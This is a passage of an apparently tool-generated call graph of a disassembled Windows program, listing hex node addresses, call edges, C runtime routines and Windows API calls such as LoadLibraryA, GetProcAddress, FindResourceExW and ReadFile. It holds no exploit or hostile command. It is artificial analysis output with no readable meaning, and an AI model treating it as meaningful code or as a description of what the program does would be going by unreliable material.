778d68 58 API calls __getptd_noexit 98716->99273 98719 7731cb 98719->98470 98720 773155 99274 778ff6 9 API calls _memcpy_s 98720->99274 98722 773160 98722->98470 98723->98470 98725 759436 98724->98725 98726 770ff6 Mailbox 59 API calls 98725->98726 98727 759444 98726->98727 98728 753936 98727->98728 99276 75935c 59 API calls Mailbox 98727->99276 98730 7591b0 98728->98730 99277 7592c0 98730->99277 98732 770ff6 Mailbox 59 API calls 98733 753944 98732->98733 98735 759040 98733->98735 98734 7591bf 98734->98732 98734->98733 98736 78f5a5 98735->98736 98738 759057 98735->98738 98736->98738 99287 758d3b 59 API calls Mailbox 98736->99287 98739 7591a0 98738->98739 98740 759158 98738->98740 98743 75915f 98738->98743 99286 759e9c 60 API calls Mailbox 98739->99286 98742 770ff6 Mailbox 59 API calls 98740->98742 98742->98743 98743->98498 98745 755045 85 API calls 98744->98745 98746 7b9854 98745->98746 99288 7b99be 98746->99288 98749 75506b 74 API calls 98750 7b9881 98749->98750 98751 75506b 74 API calls 98750->98751 98752 7b9891 98751->98752 98753 75506b 74 API calls 98752->98753 98754 7b98ac 98753->98754 98755 75506b 74 API calls 98754->98755 98756 7b98c7 98755->98756 98757 755045 85 API calls 98756->98757 98758 7b98de 98757->98758 98759 77594c __crtCompareStringA_stat 58 API calls 98758->98759 98760 7b98e5 98759->98760 98761 77594c __crtCompareStringA_stat 58 API calls 98760->98761 98762 7b98ef 98761->98762 98763 75506b 74 API calls 98762->98763 98764 7b9903 98763->98764 98765 7b9393 GetSystemTimeAsFileTime 98764->98765 98766 7b9916 98765->98766 98767 7b992b 98766->98767 98768 7b9940 98766->98768 98769 772f95 _free 58 API calls 98767->98769 98770 7b9946 98768->98770 98771 7b99a5 98768->98771 98773 7b9931 98769->98773 99294 7b8d90 98770->99294 98772 772f95 _free 58 API calls 98771->98772 98778 78d3c1 98772->98778 98776 772f95 _free 58 API calls 98773->98776 98776->98778 98777 772f95 _free 58 API calls 98777->98778 98778->98435 98779 754faa 98778->98779 98780 754fb4 98779->98780 98781 754fbb 98779->98781 98782 7755d6 __fcloseall 83 API calls 98780->98782 98783 754fdb FreeLibrary 98781->98783 98784 754fca 98781->98784 98782->98781 98783->98784 98784->98435 98786 757faf 59 API calls 98785->98786 98787 757b5d 98786->98787 98787->98663 98789 753f92 98788->98789 98793 753fb4 _memmove 98788->98793 98792 770ff6 Mailbox 59 API calls 98789->98792 98790 770ff6 Mailbox 59 API calls 98791 753fc8 98790->98791 98791->98666 98792->98793 98793->98790 98843 754d61 98794->98843 98797 754d53 98801 77548b 98797->98801 98798 754d4a FreeLibrary 98798->98797 98799 754d61 2 API calls 98800 754d3a 98799->98800 98800->98797 98800->98798 98847 7754a0 98801->98847 98803 754f5c 98803->98678 98803->98679 99005 754d94 98804->99005 98807 754ced 98808 754cff FreeLibrary 98807->98808 98809 754d08 98807->98809 98808->98809 98811 754dd0 98809->98811 98810 754d94 2 API calls 98810->98807 98812 770ff6 Mailbox 59 API calls 98811->98812 98813 754de5 98812->98813 99009 75538e 98813->99009 98815 754df1 _memmove 98816 754e2c 98815->98816 98818 754f21 98815->98818 98819 754ee9 98815->98819 98817 755027 69 API calls 98816->98817 98823 754e35 98817->98823 99023 7b9ba5 95 API calls 98818->99023 99012 754fe9 CreateStreamOnHGlobal 98819->99012 98822 75506b 74 API calls 98822->98823 98823->98822 98825 754ec9 98823->98825 98826 78dcd0 98823->98826 99018 755045 98823->99018 98825->98686 98827 755045 85 API calls 98826->98827 98828 78dce4 98827->98828 98829 75506b 74 API calls 98828->98829 98829->98825 98831 75507d 98830->98831 98832 78ddf6 98830->98832 99047 775812 98831->99047 98835 7b9393 99245 7b91e9 98835->99245 98837 7b93a9 98837->98694 98839 78ddb9 98838->98839 98840 755036 98838->98840 99250 775e90 98840->99250 98842 75503e 98842->98696 98844 754d2e 98843->98844 98845 754d6a LoadLibraryA 98843->98845 98844->98799 98844->98800 98845->98844 98846 754d7b GetProcAddress 98845->98846 98846->98844 98848 7754ac __ioinit 98847->98848 98849 7754bf 98848->98849 98851 7754f0 98848->98851 98896 778d68 58 API calls __getptd_noexit 98849->98896 98866 780738 98851->98866 98852 7754c4 98897 778ff6 9 API calls _memcpy_s 98852->98897 98855 7754f5 98856 7754fe 98855->98856 98857 77550b 98855->98857 98898 778d68 58 API calls __getptd_noexit 98856->98898 98859 775535 98857->98859 98860 775515 98857->98860 98881 780857 98859->98881 98899 778d68 58 API calls __getptd_noexit 98860->98899 98861 7754cf __ioinit @_EH4_CallFilterFunc@8 98861->98803 98867 780744 __ioinit 98866->98867 98868 779e4b __lock 58 API calls 98867->98868 98879 780752 98868->98879 98869 7807cd 98906 778a5d 58 API calls 2 library calls 98869->98906 98870 7807c6 98901 78084e 98870->98901 98873 7807d4 98873->98870 98907 77a06b InitializeCriticalSectionAndSpinCount 98873->98907 98874 780843 __ioinit 98874->98855 98876 779ed3 __mtinitlocknum 58 API calls 98876->98879 98878 7807fa EnterCriticalSection 98878->98870 98879->98869 98879->98870 98879->98876 98904 776e8d 59 API calls __lock 98879->98904 98905 776ef7 LeaveCriticalSection LeaveCriticalSection _doexit 98879->98905 98890 780877 __wopenfile 98881->98890 98882 780891 98912 778d68 58 API calls __getptd_noexit 98882->98912 98883 780a4c 98883->98882 98887 780aaf 98883->98887 98885 780896 98913 778ff6 9 API calls _memcpy_s 98885->98913 98909 7887f1 98887->98909 98888 775540 98900 775562 LeaveCriticalSection LeaveCriticalSection _fprintf 98888->98900 98890->98882 98890->98883 98914 773a0b 60 API calls 2 library calls 98890->98914 98892 780a45 98892->98883 98915 773a0b 60 API calls 2 library calls 98892->98915 98894 780a64 98894->98883 98916 773a0b 60 API calls 2 library calls 98894->98916 98896->98852 98897->98861 98898->98861 98899->98861 98900->98861 98908 779fb5 LeaveCriticalSection 98901->98908 98903 780855 98903->98874 98904->98879 98905->98879 98906->98873 98907->98878 98908->98903 98917 787fd5 98909->98917 98911 78880a 98911->98888 98912->98885 98913->98888 98914->98892 98915->98894 98916->98883 98920 787fe1 __ioinit 98917->98920 98918 787ff7 99002 778d68 58 API calls __getptd_noexit 98918->99002 98920->98918 98922 78802d 98920->98922 98921 787ffc 99003 778ff6 9 API calls _memcpy_s 98921->99003 98928 78809e 98922->98928 98925 788049 99004 788072 LeaveCriticalSection __unlock_fhandle 98925->99004 98927 788006 __ioinit 98927->98911 98929 7880be 98928->98929 98930 77471a __wsopen_nolock 58 API calls 98929->98930 98933 7880da 98930->98933 98931 779006 __invoke_watson 8 API calls 98932 7887f0 98931->98932 98935 787fd5 __wsopen_helper 103 API calls 98932->98935 98934 788114 98933->98934 98941 788137 98933->98941 98977 788211 98933->98977 98937 778d34 __read_nolock 58 API calls 98934->98937 98936 78880a 98935->98936 98936->98925 98938 788119 98937->98938 98939 778d68 _memcpy_s 58 API calls 98938->98939 98940 788126 98939->98940 98943 778ff6 _memcpy_s 9 API calls 98940->98943 98942 7881f5 98941->98942 98949 7881d3 98941->98949 98944 778d34 __read_nolock 58 API calls 98942->98944 98970 788130 98943->98970 98945 7881fa 98944->98945 98946 778d68 _memcpy_s 58 API calls 98945->98946 98947 788207 98946->98947 98948 778ff6 _memcpy_s 9 API calls 98947->98948 98948->98977 98950 77d4d4 __alloc_osfhnd 61 API calls 98949->98950 98951 7882a1 98950->98951 98952 7882ab 98951->98952 98953 7882ce 98951->98953 98955 778d34 __read_nolock 58 API calls 98952->98955 98954 787f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98953->98954 98964 7882f0 98954->98964 98956 7882b0 98955->98956 98958 778d68 _memcpy_s 58 API calls 98956->98958 98957 78836e GetFileType 98959 788379 GetLastError 98957->98959 98960 7883bb 98957->98960 98962 7882ba 98958->98962 98963 778d47 __dosmaperr 58 API calls 98959->98963 98973 77d76a __set_osfhnd 59 API calls 98960->98973 98961 78833c GetLastError 98965 778d47 __dosmaperr 58 API calls 98961->98965 98966 778d68 _memcpy_s 58 API calls 98962->98966 98967 7883a0 CloseHandle 98963->98967 98964->98957 98964->98961 98968 787f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98964->98968 98969 788361 98965->98969 98966->98970 98967->98969 98971 7883ae 98967->98971 98972 788331 98968->98972 98975 778d68 _memcpy_s 58 API calls 98969->98975 98970->98925 98974 778d68 _memcpy_s 58 API calls 98971->98974 98972->98957 98972->98961 98979 7883d9 98973->98979 98976 7883b3 98974->98976 98975->98977 98976->98969 98977->98931 98978 788594 98978->98977 98982 788767 CloseHandle 98978->98982 98979->98978 98980 781b11 __lseeki64_nolock 60 API calls 98979->98980 98997 78845a 98979->98997 98981 788443 98980->98981 98985 778d34 __read_nolock 58 API calls 98981->98985 98981->98997 98983 787f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98982->98983 98984 78878e 98983->98984 98987 7887c2 98984->98987 98988 788796 GetLastError 98984->98988 98985->98997 98986 7810ab 70 API calls __read_nolock 98986->98997 98987->98977 98989 778d47 __dosmaperr 58 API calls 98988->98989 98990 7887a2 98989->98990 98993 77d67d __free_osfhnd 59 API calls 98990->98993 98991 780d2d __close_nolock 61 API calls 98991->98997 98992 78848c 98994 7899f2 __chsize_nolock 82 API calls 98992->98994 98992->98997 98993->98987 98994->98992 98995 77dac6 __write 78 API calls 98995->98997 98996 788611 98999 780d2d __close_nolock 61 API calls 98996->98999 98997->98978 98997->98986 98997->98991 98997->98992 98997->98995 98997->98996 98998 781b11 60 API calls __lseeki64_nolock 98997->98998 98998->98997 99000 788618 98999->99000 99001 778d68 _memcpy_s 58 API calls 99000->99001 99001->98977 99002->98921 99003->98927 99004->98927 99006 754ce1 99005->99006 99007 754d9d LoadLibraryA 99005->99007 99006->98807 99006->98810 99007->99006 99008 754dae GetProcAddress 99007->99008 99008->99006 99010 770ff6 Mailbox 59 API calls 99009->99010 99011 7553a0 99010->99011 99011->98815 99013 755020 99012->99013 99014 755003 FindResourceExW 99012->99014 99013->98816 99014->99013 99015 78dd5c LoadResource 99014->99015 99015->99013 99016 78dd71 SizeofResource 99015->99016 99016->99013 99017 78dd85 LockResource 99016->99017 99017->99013 99019 755054 99018->99019 99020 78ddd4 99018->99020 99024 775a7d 99019->99024 99022 755062 99022->98823 99023->98816 99025 775a89 __ioinit 99024->99025 99026 775a9b 99025->99026 99027 775ac1 99025->99027 99037 778d68 58 API calls __getptd_noexit 99026->99037 99039 776e4e 99027->99039 99030 775aa0 99038 778ff6 9 API calls _memcpy_s 99030->99038 99031 775ac7 99045 7759ee 83 API calls 5 library calls 99031->99045 99034 775aab __ioinit 99034->99022 99035 775ad6 99046 775af8 LeaveCriticalSection LeaveCriticalSection _fprintf 99035->99046 99037->99030 99038->99034 99040 776e80 EnterCriticalSection 99039->99040 99041 776e5e 99039->99041 99043 776e76 99040->99043 99041->99040 99042 776e66 99041->99042 99044 779e4b __lock 58 API calls 99042->99044 99043->99031 99044->99043 99045->99035 99046->99034 99050 77582d 99047->99050 99049 75508e 99049->98835 99051 775839 __ioinit 99050->99051 99052 775874 __ioinit 99051->99052 99053 77584f _memset 99051->99053 99054 77587c 99051->99054 99052->99049 99077 778d68 58 API calls __getptd_noexit 99053->99077 99055 776e4e __lock_file 59 API calls 99054->99055 99056 775882 99055->99056 99063 77564d 99056->99063 99059 775869 99078 778ff6 9 API calls _memcpy_s 99059->99078 99066 775668 _memset 99063->99066 99070 775683 99063->99070 99064 775673 99175 778d68 58 API calls __getptd_noexit 99064->99175 99066->99064 99068 7756c3 99066->99068 99066->99070 99068->99070 99071 7757d4 _memset 99068->99071 99080 774916 99068->99080 99087 7810ab 99068->99087 99155 780df7 99068->99155 99177 780f18 58 API calls 3 library calls 99068->99177 99079 7758b6 LeaveCriticalSection LeaveCriticalSection _fprintf 99070->99079 99178 778d68 58 API calls __getptd_noexit 99071->99178 99076 775678 99176 778ff6 9 API calls _memcpy_s 99076->99176 99077->99059 99078->99052 99079->99052 99081 774935 99080->99081 99082 774920 99080->99082 99081->99068 99179 778d68 58 API calls __getptd_noexit 99082->99179 99084 774925 99180 778ff6 9 API calls _memcpy_s 99084->99180 99086 774930 99086->99068 99088 7810cc 99087->99088 99089 7810e3 99087->99089 99190 778d34 58 API calls __getptd_noexit 99088->99190 99091 78181b 99089->99091 99096 78111d 99089->99096 99206 778d34 58 API calls __getptd_noexit 99091->99206 99093 7810d1 99191 778d68 58 API calls __getptd_noexit 99093->99191 99094 781820 99207 778d68 58 API calls __getptd_noexit 99094->99207 99098 781125 99096->99098 99103 78113c 99096->99103 99192 778d34 58 API calls __getptd_noexit 99098->99192 99100 781131 99208 778ff6 9 API calls _memcpy_s 99100->99208 99101 78112a 99193 778d68 58 API calls __getptd_noexit 99101->99193 99104 781151 99103->99104 99107 78116b 99103->99107 99108 781189 99103->99108 99135 7810d8 99103->99135 99194 778d34 58 API calls __getptd_noexit 99104->99194 99107->99104 99110 781176 99107->99110 99195 778a5d 58 API calls 2 library calls 99108->99195 99181 785ebb 99110->99181 99111 781199 99113 7811bc 99111->99113 99114 7811a1 99111->99114 99198 781b11 60 API calls 3 library calls 99113->99198 99196 778d68 58 API calls __getptd_noexit 99114->99196 99115 78128a 99117 781303 ReadFile 99115->99117 99122 7812a0 GetConsoleMode 99115->99122 99120 7817e3 GetLastError 99117->99120 99121 781325 99117->99121 99119 7811a6 99197 778d34 58 API calls __getptd_noexit 99119->99197 99124 7817f0 99120->99124 99125 7812e3 99120->99125 99121->99120 99129 7812f5 99121->99129 99126 781300 99122->99126 99127 7812b4 99122->99127 99204 778d68 58 API calls __getptd_noexit 99124->99204 99140 7812e9 99125->99140 99199 778d47 58 API calls 3 library calls 99125->99199 99126->99117 99127->99126 99130 7812ba ReadConsoleW 99127->99130 99138 78135a 99129->99138 99129->99140 99142 7815c7 99129->99142 99130->99129 99133 7812dd GetLastError 99130->99133 99132 7817f5 99205 778d34 58 API calls __getptd_noexit 99132->99205 99133->99125 99135->99068 99136 772f95 _free 58 API calls 99136->99135 99139 7813c6 ReadFile 99138->99139 99147 781447 99138->99147 99143 7813e7 GetLastError 99139->99143 99153 7813f1 99139->99153 99140->99135 99140->99136 99141 7816cd ReadFile 99146 7816f0 GetLastError 99141->99146 99154 7816fe 99141->99154 99142->99140 99142->99141 99143->99153 99144 781504 99151 7814b4 MultiByteToWideChar 99144->99151 99202 781b11 60 API calls 3 library calls 99144->99202 99145 7814f4 99201 778d68 58 API calls __getptd_noexit 99145->99201 99146->99154 99147->99140 99147->99144 99147->99145 99147->99151 99151->99133 99151->99140 99153->99138 99200 781b11 60 API calls 3 library calls 99153->99200 99154->99142 99203 781b11 60 API calls 3 library calls 99154->99203 99156 780e02 99155->99156 99161 780e17 99155->99161 99242 778d68 58 API calls __getptd_noexit 99156->99242 99158 780e12 99158->99068 99159 780e07 99243 778ff6 9 API calls _memcpy_s 99159->99243 99161->99158 99162 780e4c 99161->99162 99244 786234 58 API calls __malloc_crt 99161->99244 99164 774916 __fputwc_nolock 58 API calls 99162->99164 99165 780e60 99164->99165 99209 780f97 99165->99209 99167 780e67 99167->99158 99168 774916 __fputwc_nolock 58 API calls 99167->99168 99169 780e8a 99168->99169 99169->99158 99170 774916 __fputwc_nolock 58 API calls 99169->99170 99171 780e96 99170->99171 99171->99158 99172 774916 __fputwc_nolock 58 API calls 99171->99172 99173 780ea3 99172->99173 99174 774916 __fputwc_nolock 58 API calls 99173->99174 99174->99158 99175->99076 99176->99070 99177->99068 99178->99076 99179->99084 99180->99086 99182 785ed3 99181->99182 99183 785ec6 99181->99183 99185 785edf 99182->99185 99186 778d68 _memcpy_s 58 API calls 99182->99186 99184 778d68 _memcpy_s 58 API calls 99183->99184 99187 785ecb 99184->99187 99185->99115 99188 785f00 99186->99188 99187->99115 99189 778ff6 _memcpy_s 9 API calls 99188->99189 99189->99187 99190->99093 99191->99135 99192->99101 99193->99100 99194->99101 99195->99111 99196->99119 99197->99135 99198->99110 99199->99140 99200->99153 99201->99140 99202->99151 99203->99154 99204->99132 99205->99140 99206->99094 99207->99100 99208->99135 99210 780fa3 __ioinit 99209->99210 99211 780fb0 99210->99211 99212 780fc7 99210->99212 99213 778d34 __read_nolock 58 API calls 99211->99213 99214 78108b 99212->99214 99217 780fdb 99212->99217 99216 780fb5 99213->99216 99215 778d34 __read_nolock 58 API calls 99214->99215 99218 780ffe 99215->99218 99219 778d68 _memcpy_s 58 API calls 99216->99219 99220 780ff9 99217->99220 99221 781006 99217->99221 99227 778d68 _memcpy_s 58 API calls 99218->99227 99234 780fbc __ioinit 99219->99234 99224 778d34 __read_nolock 58 API calls 99220->99224 99222 781028 99221->99222 99223 781013 99221->99223 99226 77d446 ___lock_fhandle 59 API calls 99222->99226 99225 778d34 __read_nolock 58 API calls 99223->99225 99224->99218 99228 781018 99225->99228 99229 78102e 99226->99229 99230 781020 99227->99230 99231 778d68 _memcpy_s 58 API calls 99228->99231 99232 781041 99229->99232 99233 781054 99229->99233 99236 778ff6 _memcpy_s 9 API calls 99230->99236 99231->99230 99235 7810ab __read_nolock 70 API calls 99232->99235 99237 778d68 _memcpy_s 58 API calls 99233->99237 99234->99167 99238 78104d 99235->99238 99236->99234 99239 781059 99237->99239 99241 781083 __read LeaveCriticalSection 99238->99241 99240 778d34 __read_nolock 58 API calls 99239->99240 99240->99238 99241->99234 99242->99159 99243->99158 99244->99162 99248 77543a GetSystemTimeAsFileTime 99245->99248 99247 7b91f8 99247->98837 99249 775468 __aulldiv 99248->99249 99249->99247 99251 775e9c __ioinit 99250->99251 99252 775ec3 99251->99252 99253 775eae 99251->99253 99255 776e4e __lock_file 59 API calls 99252->99255 99264 778d68 58 API calls __getptd_noexit 99253->99264 99257 775ec9 99255->99257 99256 775eb3 99265 778ff6 9 API calls _memcpy_s 99256->99265 99266 775b00 67 API calls 6 library calls 99257->99266 99260 775ed4 99267 775ef4 LeaveCriticalSection LeaveCriticalSection _fprintf 99260->99267 99262 775ee6 99263 775ebe __ioinit 99262->99263 99263->98842 99264->99256 99265->99263 99266->99260 99267->99262 99269 7580fa _memmove 99268->99269 99270 7580e7 99268->99270 99269->98699 99270->99269 99271 770ff6 Mailbox 59 API calls 99270->99271 99271->99269 99272->98707 99273->98720 99274->98722 99275->98719 99276->98728 99278 7592c9 Mailbox 99277->99278 99279 78f5c8 99278->99279 99284 7592d3 99278->99284 99280 770ff6 Mailbox 59 API calls 99279->99280 99282 78f5d4 99280->99282 99281 7592da 99281->98734 99282->99282 99284->99281 99285 759df0 59 API calls Mailbox 99284->99285 99285->99284 99286->98743 99287->98738 99291 7b99d2 __tzset_nolock _wcscmp 99288->99291 99289 75506b 74 API calls 99289->99291 99290 7b9393 GetSystemTimeAsFileTime 99290->99291 99291->99289 99291->99290 99292 7b9866 99291->99292 99293 755045 85 API calls 99291->99293 99292->98749 99292->98778 99293->99291 99295 7b8d9b 99294->99295 99296 7b8da9 99294->99296 99297 77548b 115 API calls 99295->99297 99298 7b8dee 99296->99298 99299 77548b 115 API calls 99296->99299 99311 7b8db2 99296->99311 99297->99296 99325 7b901b 99298->99325 99301 7b8dd3 99299->99301 99301->99298 99303 7b8ddc 99301->99303 99302 7b8e32 99304 7b8e57 99302->99304 99305 7b8e36 99302->99305 99307 7755d6 __fcloseall 83 API calls 99303->99307 99303->99311 99329 7b8c33 99304->99329 99306 7b8e43 99305->99306 99310 7755d6 __fcloseall 83 API calls 99305->99310 99306->99311 99314 7755d6 __fcloseall 83 API calls 99306->99314 99307->99311 99310->99306 99311->98777 99312 7b8e85 99338 7b8eb5 99312->99338 99313 7b8e65 99315 7b8e72 99313->99315 99317 7755d6 __fcloseall 83 API calls 99313->99317 99314->99311 99315->99311 99319 7755d6 __fcloseall 83 API calls 99315->99319 99317->99315 99319->99311 99322 7b8ea0 99322->99311 99324 7755d6 __fcloseall 83 API calls 99322->99324 99324->99311 99326 7b9029 __tzset_nolock _memmove 99325->99326 99327 7b9040 99325->99327 99326->99302 99328 775812 __fread_nolock 74 API calls 99327->99328 99328->99326 99330 77594c __crtCompareStringA_stat 58 API calls 99329->99330 99331 7b8c42 99330->99331 99332 77594c __crtCompareStringA_stat 58 API calls 99331->99332 99333 7b8c56 99332->99333 99334 77594c __crtCompareStringA_stat 58 API calls 99333->99334 99335 7b8c6a 99334->99335 99336 7b8f97 58 API calls 99335->99336 99337 7b8c7d 99335->99337 99336->99337 99337->99312 99337->99313 99339 7b8eca 99338->99339 99340 7b8f82 99339->99340 99342 7b8e8c 99339->99342 99343 7b8c8f 74 API calls 99339->99343 99371 7b8d2b 74 API calls 99339->99371 99372 7b909c 80 API calls 99339->99372 99367 7b91bf 99340->99367 99346 7b8f97 99342->99346 99343->99339 99347 7b8faa 99346->99347 99348 7b8fa4 99346->99348 99350 7b8fbb 99347->99350 99351 772f95 _free 58 API calls 99347->99351 99349 772f95 _free 58 API calls 99348->99349 99349->99347 99352 7b8e93 99350->99352 99353 772f95 _free 58 API calls 99350->99353 99351->99350 99352->99322 99354 7755d6 99352->99354 99353->99352 99355 7755e2 __ioinit 99354->99355 99356 7755f6 99355->99356 99357 77560e 99355->99357 99454 778d68 58 API calls __getptd_noexit 99356->99454 99360 776e4e __lock_file 59 API calls 99357->99360 99364 775606 __ioinit 99357->99364 99359 7755fb 99455 778ff6 9 API calls _memcpy_s 99359->99455 99362 775620 99360->99362 99438 77556a 99362->99438 99364->99322 99368 7b91cc 99367->99368 99369 7b91dd 99367->99369 99373 774a93 99368->99373 99369->99342 99371->99339 99372->99339 99374 774a9f __ioinit 99373->99374 99375 774ad5 99374->99375 99376 774abd 99374->99376 99378 774acd __ioinit 99374->99378 99379 776e4e __lock_file 59 API calls 99375->99379 99398 778d68 58 API calls __getptd_noexit 99376->99398 99378->99369 99380 774adb 99379->99380 99386 77493a 99380->99386 99381 774ac2 99399 778ff6 9 API calls _memcpy_s 99381->99399 99389 774949 99386->99389 99393 774967 99386->99393 99387 774957 99429 778d68 58 API calls __getptd_noexit 99387->99429 99389->99387 99389->99393 99397 774981 _memmove 99389->99397 99390 77495c 99430 778ff6 9 API calls _memcpy_s 99390->99430 99400 774b0d LeaveCriticalSection LeaveCriticalSection _fprintf 99393->99400 99395 774916 __fputwc_nolock 58 API calls 99395->99397 99397->99393 99397->99395 99401 77dac6 99397->99401 99431 774c6d 99397->99431 99437 77b05e 78 API calls 7 library calls 99397->99437 99398->99381 99399->99378 99400->99378 99402 77dad2 __ioinit 99401->99402 99403 77daf6 99402->99403 99404 77dadf 99402->99404 99406 77db95 99403->99406 99408 77db0a 99403->99408 99405 778d34 __read_nolock 58 API calls 99404->99405 99407 77dae4 99405->99407 99409 778d34 __read_nolock 58 API calls 99406->99409 99410 778d68 _memcpy_s 58 API calls 99407->99410 99411 77db32 99408->99411 99412 77db28 99408->99412 99413 77db2d 99409->99413 99421 77daeb __ioinit 99410->99421 99414 77d446 ___lock_fhandle 59 API calls 99411->99414 99415 778d34 __read_nolock 58 API calls 99412->99415 99417 778d68 _memcpy_s 58 API calls 99413->99417 99416 77db38 99414->99416 99415->99413 99418 77db5e 99416->99418 99419 77db4b 99416->99419 99420 77dba1 99417->99420 99424 778d68 _memcpy_s 58 API calls 99418->99424 99422 77dbb5 __write_nolock 76 API calls 99419->99422 99423 778ff6 _memcpy_s 9 API calls 99420->99423 99421->99397 99425 77db57 99422->99425 99423->99421 99426 77db63 99424->99426 99428 77db8d __write LeaveCriticalSection 99425->99428 99427 778d34 __read_nolock 58 API calls 99426->99427 99427->99425 99428->99421 99429->99390 99430->99393 99432 774c80 99431->99432 99433 774ca4 99431->99433 99432->99433 99434 774916 __fputwc_nolock 58 API calls 99432->99434 99433->99397 99435 774c9d 99434->99435 99436 77dac6 __write 78 API calls 99435->99436 99436->99433 99437->99397 99439 77558d 99438->99439 99440 775579 99438->99440 99442 775589 99439->99442 99444 774c6d __flush 78 API calls 99439->99444 99487 778d68 58 API calls __getptd_noexit 99440->99487 99456 775645 LeaveCriticalSection LeaveCriticalSection _fprintf 99442->99456 99443 77557e 99488 778ff6 9 API calls _memcpy_s 99443->99488 99446 775599 99444->99446 99457 780dc7 99446->99457 99449 774916 __fputwc_nolock 58 API calls 99450 7755a7 99449->99450 99461 780c52 99450->99461 99452 7755ad 99452->99442 99453 772f95 _free 58 API calls 99452->99453 99453->99442 99454->99359 99455->99364 99456->99364 99458 7755a1 99457->99458 99459 780dd4 99457->99459 99458->99449 99459->99458 99460 772f95 _free 58 API calls 99459->99460 99460->99458 99462 780c5e __ioinit 99461->99462 99463 780c6b 99462->99463 99464 780c82 99462->99464 99513 778d34 58 API calls __getptd_noexit 99463->99513 99465 780d0d 99464->99465 99468 780c92 99464->99468 99518 778d34 58 API calls __getptd_noexit 99465->99518 99467 780c70 99514 778d68 58 API calls __getptd_noexit 99467->99514 99471 780cba 99468->99471 99472 780cb0 99468->99472 99489 77d446 99471->99489 99515 778d34 58 API calls __getptd_noexit 99472->99515 99473 780cb5 99519 778d68 58 API calls __getptd_noexit 99473->99519 99477 780cc0 99479 780cde 99477->99479 99480 780cd3 99477->99480 99478 780d19 99520 778ff6 9 API calls _memcpy_s 99478->99520 99516 778d68 58 API calls __getptd_noexit 99479->99516 99498 780d2d 99480->99498 99484 780c77 __ioinit 99484->99452 99485 780cd9 99517 780d05 LeaveCriticalSection __unlock_fhandle 99485->99517 99487->99443 99488->99442 99490 77d452 __ioinit 99489->99490 99491 77d4a1 EnterCriticalSection 99490->99491 99492 779e4b __lock 58 API calls 99490->99492 99493 77d4c7 __ioinit 99491->99493 99494 77d477 99492->99494 99493->99477 99495 77d48f 99494->99495 99521 77a06b InitializeCriticalSectionAndSpinCount 99494->99521 99522 77d4cb LeaveCriticalSection _doexit 99495->99522 99523 77d703 99498->99523 99500 780d91 99536 77d67d 59 API calls 2 library calls 99500->99536 99502 780d3b 99502->99500 99504 77d703 __lseek_nolock 58 API calls 99502->99504 99512 780d6f 99502->99512 99503 780d99 99511 780dbb 99503->99511 99537 778d47 58 API calls 3 library calls 99503->99537 99506 780d66 99504->99506 99505 77d703 __lseek_nolock 58 API calls 99507 780d7b FindCloseChangeNotification 99505->99507 99509 77d703 __lseek_nolock 58 API calls 99506->99509 99507->99500 99510 780d87 GetLastError 99507->99510 99509->99512 99510->99500 99511->99485 99512->99500 99512->99505 99513->99467 99514->99484 99515->99473 99516->99485 99517->99484 99518->99473 99519->99478 99520->99484 99521->99495 99522->99491 99524 77d723 99523->99524 99525 77d70e 99523->99525 99527 778d34 __read_nolock 58 API calls 99524->99527 99529 77d748 99524->99529 99526 778d34 __read_nolock 58 API calls 99525->99526 99528 77d713 99526->99528 99530 77d752 99527->99530 99531 778d68 _memcpy_s 58 API calls 99528->99531 99529->99502 99533 778d68 _memcpy_s 58 API calls 99530->99533 99532 77d71b 99531->99532 99532->99502 99534 77d75a 99533->99534 99535 778ff6 _memcpy_s 9 API calls 99534->99535 99535->99532 99536->99503 99537->99511 99600 781b90 99538->99600 99541 7548f7 99602 757eec 99541->99602 99542 7548da 99543 757d2c 59 API calls 99542->99543 99545 7548e6 99543->99545 99546 757886 59 API calls 99545->99546 99547 7548f2 99546->99547 99548 7709d5 99547->99548 99549 781b90 __write_nolock 99548->99549 99550 7709e2 GetLongPathNameW 99549->99550 99551 757d2c 59 API calls 99550->99551 99552 75741d 99551->99552 99553 75716b 99552->99553 99554 7577c7 59 API calls 99553->99554 99555 75717d 99554->99555 99556 7548ae 60 API calls 99555->99556 99557 757188 99556->99557 99558 78ecae 99557->99558 99559 757193 99557->99559 99564 78ecc8 99558->99564 99612 757a68 61 API calls 99558->99612 99561 753f84 59 API calls 99559->99561 99562 75719f 99561->99562 99606 7534c2 99562->99606 99565 7571b2 Mailbox 99565->98514 99567 754f3d 136 API calls 99566->99567 99568 7569ef 99567->99568 99569 78e45a 99568->99569 99570 754f3d 136 API calls 99568->99570 99571 7b97e5 122 API calls 99569->99571 99572 756a03 99570->99572 99573 78e46f 99571->99573 99572->99569 99574 756a0b 99572->99574 99575 78e490 99573->99575 99576 78e473 99573->99576 99578 756a17 99574->99578 99579 78e47b 99574->99579 99577 770ff6 Mailbox 59 API calls 99575->99577 99580 754faa 84 API calls 99576->99580 99592 78e4d5 Mailbox 99577->99592 99613 756bec 99578->99613 99719 7b4534 90 API calls _wprintf 99579->99719 99580->99579 99583 78e489 99583->99575 99585 78e689 99586 772f95 _free 58 API calls 99585->99586 99587 78e691 99586->99587 99588 754faa 84 API calls 99587->99588 99594 78e69a 99588->99594 99592->99585 99592->99594 99597 757f41 59 API calls 99592->99597 99705 75766f 99592->99705 99713 7574bd 99592->99713 99720 7afc4d 59 API calls 2 library calls 99592->99720 99721 7afb6e 61 API calls 2 library calls 99592->99721 99722 7b7621 59 API calls Mailbox 99592->99722 99593 772f95 _free 58 API calls 99593->99594 99594->99593 99596 754faa 84 API calls 99594->99596 99723 7afcb1 89 API calls 4 library calls 99594->99723 99596->99594 99597->99592 99601 7548bb GetFullPathNameW 99600->99601 99601->99541 99601->99542 99603 757f06 99602->99603 99605 757ef9 99602->99605 99604 770ff6 Mailbox 59 API calls 99603->99604 99604->99605 99605->99545 99607 7534d4 99606->99607 99611 7534f3 _memmove 99606->99611 99609 770ff6 Mailbox 59 API calls 99607->99609 99608 770ff6 Mailbox 59 API calls 99610 75350a 99608->99610 99609->99611 99610->99565 99611->99608 99612->99558 99614 756c15 99613->99614 99615 78e847 99613->99615 99729 755906 60 API calls Mailbox 99614->99729 99815 7afcb1 89 API calls 4 library calls 99615->99815 99618 78e85a 99816 7afcb1 89 API calls 4 library calls 99618->99816 99619 756c37 99730 755956 99619->99730 99623 756c54 99625 7577c7 59 API calls 99623->99625 99624 78e876 99628 756cc1 99624->99628 99626 756c60 99625->99626 99743 770b9b 60 API 